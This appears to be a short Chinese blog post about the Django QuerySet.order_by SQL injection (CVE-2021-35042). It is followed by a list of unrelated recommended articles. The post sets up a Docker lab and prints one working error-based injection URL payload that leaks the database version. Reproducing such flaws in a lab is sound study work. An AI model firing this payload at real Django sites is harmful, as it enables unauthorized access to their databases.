Django QuerySet.order_by SQL注入漏洞(CVE-2021-35042)

漏洞描述

Django 于 2021年7月1日发布了一个安全更新,修复了函数QuerySet.order_by中的 SQL 注入漏洞。

参考链接:

该漏洞需要开发人员使用order_by功能。此外,还可以控制查询集的输入。

漏洞环境及利用

搭建docker环境

payload

/vuln/?order=vuln_collection.name);select%20updatexml(1,%20concat(0x7e,(select%20@@version)),1)%23

相关推荐
qq_334466866 小时前
删除SSMS的历史登录记录
数据库·sql
小宋102110 小时前
SQL + RAG 混合问答实战:结构化指标与文档证据如何统一路由
java·jvm·人工智能·sql
不恋水的雨10 小时前
gbase中union all导致末尾多出空格的坑
数据库·sql·mysql
曹牧11 小时前
PL/SQL Developer:导出建表语句
数据库·sql
FYKJ_201013 小时前
springboot贺州地方新闻网站87812-计算机课程设计、毕业设计
java·vue.js·spring boot·python·mysql·django·课程设计
润乾软件17 小时前
LLM 规划,编译器生成:以工作流为契约的确定性 SQL 生成器
人工智能·sql·sqlazy
高洁0117 小时前
AI视频生成技术:从静态图文到动态视觉的内容智能革命
python·深度学习·django·transformer·tornado
oradh18 小时前
Oracle固定执行计划的方法----SQL Profie(二)
数据库·sql·oracle
我的xiaodoujiao20 小时前
Django 基础知识详细图文教程 12-Django 模型定义与使用 2
后端·python·django
Wx-bishekaifayuan1 天前
django个性化旅游路线推荐平台49005-计算机课程设计、毕业设计
spring boot·后端·python·django·课程设计·express·旅游